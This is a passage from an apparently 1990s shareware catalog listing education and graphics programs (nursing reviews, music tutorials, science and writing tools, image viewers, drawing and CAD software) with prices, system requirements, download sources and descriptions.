Registration fee: $28.50 + Registration benefits: Three months phone support, one year of + free updates. + Look for: CNAV3U.ZIP on BBSs (call 714-681-6221 to download it at + no charge); CNAV3U.ZIP on CompuServe in CIS:EDUCATION forum + LIBrary 2 (or contact userID 70742,2473 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A certified nursing assistant evaluation testing program. There + are no short cuts in the process of learning but it can be fun + learning at home on your own PC. this self assessment tool + should be used to find weak areas you might have, the material + in this program text are not designed to provide the user with + an opportunity to escape from learning basic information which + can only be obtained from textbooks. However as a reviewing + tool the cna can successfully solve the program questions. + + + Product: CPR ByStander Review + Author: PC-DSD, 800-427-8123 + Version: 2.O (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $22.50 + Registration benefits: Phone support, one year of free updates. + Look for: CPRV21.ZIP on BBSs (call 714-681-6221 to download it at + no charge); CPRV21.ZIP on CompuServe in CIS:BUSINESS forum + LIBrary 2 (or contact userID 70742,2473 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + An electronic review of Bystander and fundamental nursing for + the certified nursing assistant. This information is for review + and does not take the place of on the job experience or + approved training. Good evaluation tool for CNA, LVN and all + staff in the work place. + + + Product: Creativity Package [***] + Become more creative & improve your writing. See full + description on page 249. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 505. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 700. + + Chapter 13, "Education" 540 + + + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 434. + + Product: LVN/Vocational Review Program + Author: PC-DSD, 800-427-8123 + Version: 2.1 (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $37.50 + Registration benefits: Three months phone support, one year of + free updates. + Look for: LVNV3U.ZIP on BBSs (multiple files) (call 714-681-6221 + to download it at no charge). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + An electronic review of medical-Surgical nursing for the LVN or + LPN. A vocational nurse evaluation testing program which is + based on the purpose of self study,dedicated to enhance your + knowledge as license vocational nurse. There are no short cuts + in the process of learning but it can be fun learning at home + on your PC. This self assessment tool should be used to find + weak areas you might. Good luck. + + + Product: New Testament for Windows + New Testament search, maps, study aids, notes. See full + description on page 657. + + Product: Poetry Generator [***] + Turn your computer into a poet! See full description on + page 250. + + + 13.13 Math + + See also: Mathematics. + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 677. + + + 13.14 Music + + See also: Home & hobby, Music. + + Product: MOZART (Virtuoso Edition) + Music processor. See full description on page 632. + + Chapter 13, "Education" 541 + + + + Product: A MUSICAL TUTORIAL + Author: R. Swerdfeger, 613-933-7871 + Version: 1.1 (06-01-95) + Needs: IBM PC, DOS 4.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Mouse; Epson printer. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 1-month return policy; + disks of other shareware; discounts on other products; + discounts on upgrades. 6-month free upgrading allowed. + Look for: MTDOS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An excellent way to promote and encourage musical study using a + graphically oriented environment. Great for children or adults. + Treble & bass sight reading (notes & chords). Associate notes + to piano keys. Chord dictionary. Action games to promote + learning. Play, view, and print scales, chords, and broken + chords. User log tracks learning. Play classics. Print sight + reading test papers (3 difficulty levels). Key signature + recognition, Etc. Makes music lessons fun for children or + adults! + + + Product: A MUSICAL TUTORIAL for Windows + Author: R. Swerdfeger, 613-933-7871 + Version: 1.2 (06-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Mouse; Epson printer; sound card. + Registration fee: $25.00 (add $2.50 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + 1-month return policy; bonus utilities; disks of other + shareware; discounts on other products; discounts on upgrades. + 6-month free upgrading allowed. + Look for: MTWIN12.ZIP on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + An excellent way to encourage musical study using a graphically + oriented environment. Treble / Bass note & chord sight reading. + Associate notes to piano keys. Chord dictionary. Action games + to promote learning. Play, view and print scales, chords and + broken chords. User log tracks learning. Play classics. Print + sight reading test papers. User levels. Key signature + recognition, Etc. Makes music lessons fun for children or + adults! Supports SuperVGA. + + Chapter 13, "Education" 542 + + + + Product: MusicEase + Music score editor with WYSIWYG interface. See full + description on page 634. + + Product: NoteWorthy + Music publishing system. See full description on page 635. + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 242. + + + 13.15 Science & ecology + + Product: AstroFormulaCalculator 3 + Spreadsheet calculator science engin finance. See full + description on page 270. + + Product: CircumSpace + Space travel simulator by author of SkyGlobe. See full + description on page 582. + + Product: CULTURAL AWARENESS + Cultural literacy game. See full description on page 505. + + Product: Ecomaster + Author: Cascoly Software, 206-523-6135 + Version: 2.04 (11-03-92) + Needs: IBM PC, DOS 2.1 or better. EGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; bonus utilities; bonus + graphics; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; ECO.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1706 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + A diverting ecology game for one or more players in which you + bid for and trade animals based on their abilities to thrive in + different environments. No previous biological experience is + assumed. For ages 10 and up. Uses EGA images of the animals, + and scanned images for the ecological backdrops. + + Chapter 13, "Education" 543 + + + + Product: ESPTEST + Author: Selfhelp Software, 916-927-2602 + Version: 1.0 (05-26-92) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 51/4" master disk(s); 3 + months of unlimited phone, newsletter, mail support; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs; ESPTES.ZIP on CompuServe + in CIS:NEWAGE forum LIBrary 2 (or contact userID 70724,2276 for + assistance). + Download size: 93k (about seven minutes with a 2400 baud modem) + Description: + A serious parapsychology tool that is easy to use. It can be + used by the student of parapsycholog or anyone who wants to go + on a journey of self discovery. After you selec the testing + mode you want and the file name you want it can record your + efforts to defey the laws of chance. Results display into two + screens of statistics and the file can be read into other + statistic programs for analysis. Use in psychology or + statistics class. + + + Product: GREEN + Ecology simulation game. See full description on page 697. + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great. See full + description on page 604. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 662. + + Product: Marnav + Conversion of GPS to and from LORAN data. See full description + on page 649. + + Product: Mathplot + Mathematical function plotting program. See full description + on page 448. + + Chapter 13, "Education" 544 + + + + Product: Me & My Metabolism + Author: MoonStone Software, 505-982-7251 + Version: 1.20 (12-12-93) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: MMM120.ZIP on BBSs (call 505-662-0659 to download it at + no charge); MMM12.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 7 (or contact userID 71021,3617 for assistance); + MMM120.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + Examines your basal metabolic rate, assesses your energy + expenditure and evaluates your eating style. Focuses on the + individual person because body shape is an individual matter + influenced by the interplay of genetics, culture, personal + behavior, notions and feelings. There is no generic fat that + melts and stays away just because you "eat fewer calories." + You'll be surprised to discover how small changes in execise, + caloric intake or even the types of food you eat can make a + dramatic difference. + + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 381. + + Product: Nonlin + Linear and nonlinear statistical regression. See full + description on page 445. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 407. + + Product: PC-TRACK + Satellite tracking package. See full description on page 583. + + Chapter 13, "Education" 545 + + + + Product: Periodic Table + Author: SMI Corporation, 918-241-2301 + Version: 2.03 (05-19-94) + Needs: IBM AT (80286), Windows 3.1 or better. 3072k RAM; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $15.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $7.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. + Look for: PT203*.ZIP on BBSs (multiple files) (call 918-747-2542 + to download it at no charge); PERTAB.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 72644,2335 for + assistance). + Download size: 479k (about 36 minutes with a 2400 baud modem) + Description: + The ultimate periodic table. It shows all 110 chemical + elements. Gives over 30 data items for each one. View element + details on multiple elements via its MDI interface. It has data + on over 800 isotopes and can display radioactive decay trees + for over 500. Has a quiz mode to test your knowlege of the + elements. View bond properties. Allows printing of the Table, + data and decay trees. Now has x-ray data. Supports the Windows + clipboard and DDE. Great for students, researchers or + professionals. + + + Product: Simstat + Complete statistics and simulation program. See full + description on page 446. + + Product: SkyGlobe + Desktop planetarium that is fast, fun, easy. See full + description on page 583. + + Product: WinDatCon + Windows data conversion program. See full description on + page 145. + + Product: WinGraph + Cartesian (2D & 3D) & polar equation grapher. See full + description on page 444. + + + 13.16 Writing + + See also: Writing applications. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 246. + + Chapter 13, "Education" 546 + + + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 251. + + Product: Cliche Finder [***] + Checks writing cliches. See full description on page 243. + + Product: Creativity Package [***] + Become more creative & improve your writing. See full + description on page 249. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 706. + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 242. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 682. + + Product: Zpeller + Author: Unicorn Software Limited, 816-429-3558 + Version: 4.10 (01-01-95) + Needs: IBM PC, DOS 2.11 or better. 330k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; + Mouse. + Registration fee: $19.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: ZPELR410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ZPELER.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 68 + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + An easy and effective way to improve spelling and vocabulary + for the individual student or an entire classroom. Tests + students in not only correct spelling but the word's + definition. Tracks words continually missed to help the + th + student concentrate on those words. Whether the user is a 4 + grader with weekly tests or an out of school adult wanting to + improve those crucial spelling and vocabulary skills; Zpeller + + Chapter 13, "Education" 547 + + + + is there to help. Handles up to 19 students at once, up to + 64,000 words per student. + + + 13.17 Software tools & add-ins + + 13.17.1 For other + + Product: Scholar Utilities + Author: Hawk Software, 306-543-8899 + Version: 2.11 (02-01-93) + Needs: IBM PC, DOS 3.0 or better. WordPerfect 5.1 for DOS. + Registration fee: $20.00 + Registration benefits: Master disks, unlimited phone support. + Look for: availability unknown on BBSs; SCUT21.ZIP on CompuServe + in CIS:WPUSERS forum LIBrary 0 (or contact userID 75130,1650 + for assistance). + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + A macro system add-on for WordPerfect 5.1 for DOS. Written by + students in a Masters degree program, it boosts WordPerfect's + effectiveness by automatically putting footnotes in Turabian + format, sorts Bibliography entries and more. One of its + outstanding features is a Greek and Hebrew keyboard that allows + you to type in text with ease. Greek accents are no problem. + Hebrew is entered from right to left. This is a package that no + student should be without. + + + Product: WinFlash + Windows flash card program. See full description on page 512. + + + 13.18 Other + + Product: ELMER + Author: Software for Amateur Radio, 301-593-6136 + Version: 1.00 (05-01-92) + Needs: IBM PC, DOS 1.0 or better. + Registration fee: $45.00 + Registration benefits: Phone support, free upgrades. + Look for: ELMER100.ZIP on BBSs (call 301-593-9067 to download it + at no charge); ELMER1.ZIP on CompuServe in CIS:HAMNET forum + LIBrary 0 (or contact userID 70531,1405 for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An expert system based on a finite state machine using table + driven software. The declarative knowledge is stored in the + form of separate ASCII text and command files. The procedural + knowledge is stored in the state table. The Data files + correspond to the Knowledge Engine (and the Inference Engine), + the State Tables correspond to the Inference Engine. Also + contains an ASCII editor for text files, and a tool to view the + state table. Educational and useful for S/W support. + + Chapter 14, "Graphics" 548 + + + + + + Chapter 14 + Graphics + + + 14.1 Viewing programs + + Product: BitMapZ For Windows + Windows BMP Slide Show & Presentation System. See full + description on page 562. + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 338. + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 570. + + Product: Drag And View + File viewers for Windows 3.1. See full description on page 61. + + Product: ES-NMB + Network message board. See full description on page 433. + + Product: ICL Builder + Author: Sloop Software, 719-260-0433 + Version: 1.0 (06-06-93) + Needs: IBM AT (80286), Windows 3.1 or better. 100k RAM; EGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $12.50 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; MCICLB.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 72540,144 + for assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Lets the user easily build and maintain icon libraries for use + by program such as Program Manager and others. View and + extract icons from ico, exe, dll and icl files. Build as many + libraries as desired with up to 1000 icons in each library. + Export individual icons from libraries as ico or bmp files. + Import bmp files as icons. + + Chapter 14, "Graphics" 549 + + + + Product: Image'n'Bits + Author: Bananas Software Inc, 201-265-9855 + Version: 1.0 (11-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2k RAM. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; IMA.ZIP on CompuServe in + CIS:GRAPHSUP forum LIBrary 5 (or contact userID 70372,3466 for + assistance). + Download size: 470k (about 35 minutes with a 2400 baud modem) + Description: + Multiple image display, OLE, full clipboard support, printing, + funhouse distortion filters, multiple edge detection, + algorithms, contrast & brightness adjustments, histogram tool, + blurring, sharpening, low and high pass filtering, embossing, + on line help, dithering, color reduction, various file format + conversions, add text to images, posterization, mosaic, gray + scale, etc. + + + Product: Jasc Media Center [***] + Multimedia file cataloging. See full description on page 576. + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 62. + + Product: Paint Shop [***] + Author: JASC, Inc., 612-930-9171 + Version: 3.0 (08-14-93) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 3-month limited return policy. + Look for: PS.ZIP on BBSs; PS.ZIP on CompuServe in CIS:WINSHARE + forum LIBrary 10 (or contact userID 72557,256 for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + This Windows program will display, convert, alter, print + images. Paint Shop supports BMP, CUT, DIB, GIF, IMG, LBM, MAC, + MSP, PCX, PIC, RLE, TGA, TIFF, and WPG. Altering includes + resizing, cropping, dithering, color adjusting, and much more. + Also does screen capturing. Editor's Choice - Shareware + Magazine. + + Chapter 14, "Graphics" 550 + + + + Product: Paint Shop Pro [***] + Complete painting image creation editing tool. See full + description on page 558. + + Product: Papers + Wallpaper utilities for Windows. See full description on + page 214. + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 581. + + Product: PixFolio Image Catalog System + Windows image catalog utility. See full description on + page 576. + + Product: PrintGF + Image printer. See full description on page 88. + + Product: PrintGL + Pen plotter emulator package. See full description on page 88. + + Product: RISS Icon Pak + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (05-02-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: RISSICON.ZIP on BBSs (call 401-7673931 to download it + at no charge); RICON.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + 2001 icons for Windows, plus the handy RISS Icon viewer utility + for viewing icons on a full-screen window! The icons are + conveniently categorized and divided into library collections, + such as games, applications, utilities, system, and many more. + Comes complete with SETUP system to automatically install on + "auto pilot". + + + Product: Super VGA Puzzle + Puzzle program based on travel photography. See full + description on page 687. + + Chapter 14, "Graphics" 551 + + + + Product: WinClip + Author: OsoSoft, 805-528-1759 + Version: 3.5 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: WINCLIP.ZIP on BBSs (call 805-528-1759 to download it + at no charge); WNCLIP.ZIP on CompuServe in CIS:DTPFORUM forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + An ideal way to view, print, and manage BMP, PCX, and GIF + files. AutoZoom shows images same size. Zoom from 10% to 500%. + Scroll. Prints individual images or thumbnail catalogs, with + file names and directories. Move, copy, or delete files. Load + any image into graphics editor of choice. Fast and easy to use. + + + 14.2 Drawing/editor programs + + See also: Business, Organization charts. + + Product: Cards+More + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $29.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; CARDSM.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 7 (or contact userID 76534,1166 + for assistance). + SWREG#: 6325 + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use graphics program. Creates cards, + announcements, labels, name tags, table tents, etc. Text, + graphics, shapes, lines. Supports 10 graphics formats. Re- + sizing, snap-to-grid, drag & drop. Many text attributes, in + cluding 180-degree rotation. Code 39 bar codes, POSTNET, auto- + numbering, import, merge, crop marks. High quality printing. + File managment. More. + + Chapter 14, "Graphics" 552 + + + + Product: Chartist(tm) + Author: Novagraph, Inc., 214-231-2169 + Version: 1.04 (01-01-93) + Needs: IBM PC, Windows 3.0 or better. 250k RAM; EGA monitor; + Mouse. + Strongly recommended: VGA monitor; HP LaserJet printer; + Postscript printer. + Registration fee: $69.95 (add $3.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, mail + support. Bonus symbols. + Look for: NGCHR104.ZIP on BBSs; NGCHAR.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (or contact userID 74036,2325 for + assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This comprehensive flow charting and org charting package + features full color and font support, multiple symbol and + border styles and automatic routing of lines in multiple + styles. It also supports hypertext references to other + documents, import of bitmap graphics into symbols, and export + of data into other Windows applications. "Trophy Rated by + Public Brand Software." Shareware Industry Awards nominee for + "Best New Business Application of 1992." + + + Product: DRAFT CHOICE + Powerful, vector based CAD program. See full description on + page 565. + + Product: EDGEFLOW + Author: Pacestar Software + Version: 5.0 (02-24-93) + Needs: IBM PC, DOS 2.0 or better. 500k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; HP LaserJet printer; + Postscript printer; Epson printer. + Registration fee: $49.95 (add $10.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). + Look for: EDGFLW.ZIP on BBSs (call 415-323-4193 to download it at + no charge). + Download size: 235k (about 18 minutes with a 2400 baud modem) + Description: + A flowcharting and diagramming program for DOS. It provides + fast, powerful, easy to use features for creating, maintaining, + and formatting any type of diagram consisting of shapes and + connectors (arrows) between shapes. Shapes automatically + + Chapter 14, "Graphics" 553 + + + + adjust to text. Connectors automatically adjust when + connecting figures are moved. Pop-up menu interface, highly + customizable, WYSIWYG output to many printers including most + laser printers and many plotters. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 237. + + Product: FF Business Cards + Create/print business and rolodex cards. See full description + on page 159. + + Product: FF Designer Envelopes + Drag and drop envelope designer/printer. See full description + on page 97. + + Product: FlowDraw Plus + Version: 1.00 (03-20-95) + Needs: IBM 80386, DOS 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 12 + months of fax, CompuServe, mail support. 2-month return policy. + 3-month free upgrading allowed. + Look for: FDPLUS10.ZIP on BBSs (call 216-381-3320 to download it + at no charge); FDPLUS.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 73230,403 for assistance). + Download size: 640k (about 48 minutes with a 2400 baud modem) + Description: + Helps you draw and print diagrams, flowcharts, and schematics. + Graphic interface uses a mouse - just point and click to draw. + Has 3 levels of zoom, 6 font sizes for text, automatic line and + arrow drawing, snap to grid, multiple undo, and full page view. + Program comes with symbol libraries for flowcharts, + electronics, and computers. Or you can create your own symbols + and symbol libraries. Import and export PCX files. Interactive + tutorial included. Most printers supported. + + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 566. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 560. + + Product: ProtoCAD 3D + 3-dimensional CAD/rendering program. See full description on + page 568. + + Chapter 14, "Graphics" 554 + + + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 81. + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 571. + + Product: SuperFlow + Author: Advanced Technology Group, Inc., 312-225-8133 + Version: V1.10 (10-01-93) + Needs: IBM PC, Windows 3.0 or better. 2048k RAM; VGA monitor; + Mouse. + Strongly recommended: SVGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; XSLFOW.EXE on CompuServe + in CIS:IBMAPP forum LIBrary 0 (or contact userID 70671,2257 for + assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Powerful Windows based flowcharting and presentation + diagrammer. Features include auto connections re-routing, + configurable defaults, user defined objects (drawing objects, + connectors, templates), group operations (move, delete, align + space, font formatting and etc.), BMP import/export, zoom in/ + out, sub-chart linkage, password protection, tools box, + floating palette, cure/direct/auto line connections, extensive + drawing libraries, online help, clipboard supports and a lot + more. + + Chapter 14, "Graphics" 555 + + + + Product: TommySoftware CAD/Draw + Version: 1.10b (04-16-93) + Needs: IBM AT (80286), Windows 3.0 or better. 2048k RAM; VGA + monitor; Hard disk; Mouse. + Strongly recommended: SVGA monitor. + Registration fee: $49.95 (add $4.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TSCD_?.EXE on CompuServe + in CIS:GRAPHICS forum LIBrary 0 (multiple files) (or contact + userID 100020,3647 for assistance). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A powerful CAD and drawing program for Windows. Features + numerous drawing tools, associative dimensioning, user defined + hatchings, context sensitive help. Included is a DXF import + filter. + + + Product: Top Draw + Author: Top Software, 303-838-0384 + Version: 2.0 (06-30-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $59.95 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, + newsletter, mail support; 2-month limited return policy; bonus + data; bonus graphics; bonus templates; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: TOPDR20A.ZIP on BBSs (multiple files); TOPD20.ZIP on + CompuServe in CIS:DTPFORUM forum LIBrary 6 (or contact userID + 72643,436 for assistance). + SWREG#: 1811 + Download size: 820k (about 61 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 winner, Shareware Industry + Awards. + Description: + 1994 SIA Award Winner for Best Graphics Program! Powerful yet + easy to use object-oriented drawing program. For: DTP, charts, + illustrations, logos, brochures, newsletters, more. Rotating + text, text on a line, convert text to curves, text wraps to fit + shapes, gradient fills, textures, calligraphic pens, unlimited + named layers, complete Bezier curve support, context-sensitive + help, status line, excellent shape palette, comprehensive + multi-level undo. Import/export WMF, BMP and PCX. Much more! + + Chapter 14, "Graphics" 556 + + + + Product: TreeDraw + Family tree graphics chart editor. See full description on + page 607. + + Product: WinGraph + Cartesian (2D & 3D) & polar equation grapher. See full + description on page 444. + + + 14.3 Paint programs + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 237. + + Product: Paint Shop Pro [***] + Author: JASC, Inc., 612-930-9171 + Version: 3.1 (08-11-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; bonus graphics; discounts on + upgrades. + Look for: PSP31.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PSP.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4448 + PsL#: 10286 + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + The complete Windows graphics program for image creation, + viewing, and manipulation. Features include painting with 8 + brushes, photo retouching, image enhancement and editing, color + enhancement, image browser, batch conversion and scanner + support. Included are 20 standard filters and 12 deformations. + Support plug-in filters. Over 34 file formats supported. Winner + SIA and ZiffNet awards. + + Chapter 14, "Graphics" 557 + + + + Product: PC-Draft II + Author: Natural Software, 708-377-7320 + Version: 3.26 (01-01-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Mouse. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, 